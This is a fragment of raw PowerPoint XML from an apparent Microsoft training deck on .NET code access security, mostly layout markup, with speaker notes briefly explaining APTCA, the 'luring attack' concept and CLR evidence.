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96" r:id="rId2"/>
    <p:sldId id="389" r:id="rId3"/>
    <p:sldId id="407" r:id="rId4"/>
    <p:sldId id="429" r:id="rId5"/>
    <p:sldId id="430" r:id="rId6"/>
    <p:sldId id="431" r:id="rId7"/>
    <p:sldId id="424" r:id="rId8"/>
    <p:sldId id="433" r:id="rId9"/>
    <p:sldId id="432" r:id="rId10"/>
    <p:sldId id="434" r:id="rId11"/>
    <p:sldId id="416" r:id="rId12"/>
    <p:sldId id="417" r:id="rId13"/>
    <p:sldId id="418" r:id="rId14"/>
    <p:sldId id="419" r:id="rId15"/>
    <p:sldId id="420" r:id="rId16"/>
    <p:sldId id="421" r:id="rId17"/>
    <p:sldId id="422" r:id="rId18"/>
    <p:sldId id="423" r:id="rId19"/>
    <p:sldId id="435" r:id="rId20"/>
    <p:sldId id="427" r:id="rId21"/>
    <p:sldId id="428" r:id="rId22"/>
    <p:sldId id="425" r:id="rId23"/>
    <p:sldId id="426" r:id="rId24"/>
    <p:sldId id="414" r:id="rId25"/>
    <p:sldId id="415" r:id="rId26"/>
    <p:sldId id="413" r:id="rId27"/>
    <p:sldId id="326" r:id="rId28"/>
    <p:sldId id="436" r:id="rId29"/>
    <p:sldId id="437" r:id="rId30"/>
    <p:sldId id="441" r:id="rId31"/>
    <p:sldId id="442" r:id="rId32"/>
    <p:sldId id="443" r:id="rId33"/>
    <p:sldId id="439" r:id="rId34"/>
    <p:sldId id="440" r:id="rId35"/>
    <p:sldId id="438" r:id="rId36"/>
    <p:sldId id="404" r:id="rId37"/>
    <p:sldId id="411" r:id="rId38"/>
    <p:sldId id="412" r:id="rId39"/>
    <p:sldId id="410" r:id="rId40"/>
    <p:sldId id="290" r:id="rId41"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-GB"/>
    </a:defPPr>
    <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="60000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:buClr>
        <a:srgbClr val="D60093"/>
      </a:buClr>
      <a:buSzPct val="65000"/>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
      <a:defRPr b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="60000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:buClr>
        <a:srgbClr val="D60093"/>
      </a:buClr>
      <a:buSzPct val="65000"/>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
      <a:defRPr b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="60000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:buClr>
        <a:srgbClr val="D60093"/>
      </a:buClr>
      <a:buSzPct val="65000"/>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
      <a:defRPr b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="60000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:buClr>
        <a:srgbClr val="D60093"/>
      </a:buClr>
      <a:buSzPct val="65000"/>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
      <a:defRPr b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="60000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:buClr>
        <a:srgbClr val="D60093"/>
      </a:buClr>
      <a:buSzPct val="65000"/>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
      <a:defRPr b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr b="1" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx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uoping Ma" initials="" lastIdx="114" clrIdx="0"/>
  <p:cmAuthor id="1" name="Dafydd" initials="" lastIdx="8" clrIdx="1"/>
  <p:cmAuthor id="2" name="Martin Harwar" initials="" lastIdx="10" clrIdx="2"/>
  <p:cmAuthor id="3" name="David Lowe" initials="" lastIdx="1" clrIdx="3"/>
  <p:cmAuthor id="4" name="dianaj" initials="" lastIdx="1" clrIdx="4"/>
  <p:cmAuthor id="5" name="Microsoft User" initials="" lastIdx="21" clrIdx="5"/>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hiddenSlides="1" frameSlides="1"/>
  <p:clrMru>
    <a:srgbClr val="EEF8C4"/>
    <a:srgbClr val="EB7C35"/>
    <a:srgbClr val="FF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2" autoAdjust="0"/>
    <p:restoredTop sz="58065" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="51" d="100"/>
          <a:sy n="51" d="100"/>
        </p:scale>
        <p:origin x="-147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106"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="-1524" y="42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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>MGB 2003</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1945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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8686800"/>
            <a:ext cx="61849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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="800" b="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>© 2003 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6246813" y="8686800"/>
            <a:ext cx="61118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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D5582F4E-E7F5-42FD-8D8B-F9F477A2393D}"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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>MGB 2003</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297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9702" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8791575"/>
            <a:ext cx="5667375" cy="3508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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="800" b="0">
                <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29703" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5583238" y="8685213"/>
            <a:ext cx="1273175"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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0">
                <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{DEE41DBC-2AE9-49CD-9075-8D71BA3D720B}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:hf dt="0"/>
  <p:notesStyle>
    <a:lvl1pPr marL="180975" indent="-180975" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:buChar char="•"/>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="447675" indent="-77788" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:buChar char="•"/>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="636588" indent="-9525" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:buChar char="•"/>
      <a:defRPr sz="900" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="815975" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:buChar char="•"/>
      <a:defRPr sz="900" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="995363" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:buChar char="•"/>
      <a:defRPr sz="900" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Franklin Gothic Medium"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en.wikipedia.org/wiki/Buffer_overflow" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide33.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="#cite_note-4"/></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en.wikipedia.org/wiki/Buffer_overflow"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hyperlink" Target="#cite_note-4"/></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557BE3D3-34C5-46AC-BBFB-6EED1F0839FF}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365570" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365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US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>MGB 2003</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEE41DBC-2AE9-49CD-9075-8D71BA3D720B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>12</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US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>MGB 2003</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEE41DBC-2AE9-49CD-9075-8D71BA3D720B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>13</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s-US" dirty="0" smtClean="0"/>
              <a:t>http://blogs.msdn.com/shawnfa/archive/2009/05/20/net-4-0-security.aspx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The result of adding APTCA any un-trusted / partially trusted code can call the trusted code. The trusted code then executes the privileged code on the behalf of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the un-trusted code. This is known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Luring Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>where an attacker can take advantage of use of APTCA to lure a Fully Trusted assembly to execute un-trusted code on its behalf like calling the privileged operation on the victim machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1200" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Medium" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evidence is the information that the common language runtime uses to make decisions based on security policy. Evidence indicates to the runtime that code has a particular characteristic. Common forms of evidence include digital signatures and the location where code originates, but evidence can also be custom-designed to represent other information that is meaningful to the application. Both assemblies and application domains receive permission grants based on evidence.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Header Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>MGB 2003</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>© 2004 Microsoft Corporation. All rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DEE41DBC-2AE9-49CD-9075-8D71BA3D720B}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>18</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BF51324E-E5C8-4878-ADA1-427FBD1DA936}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328708" name="Rectangle 4"/>
          <p:cNvSpPr>
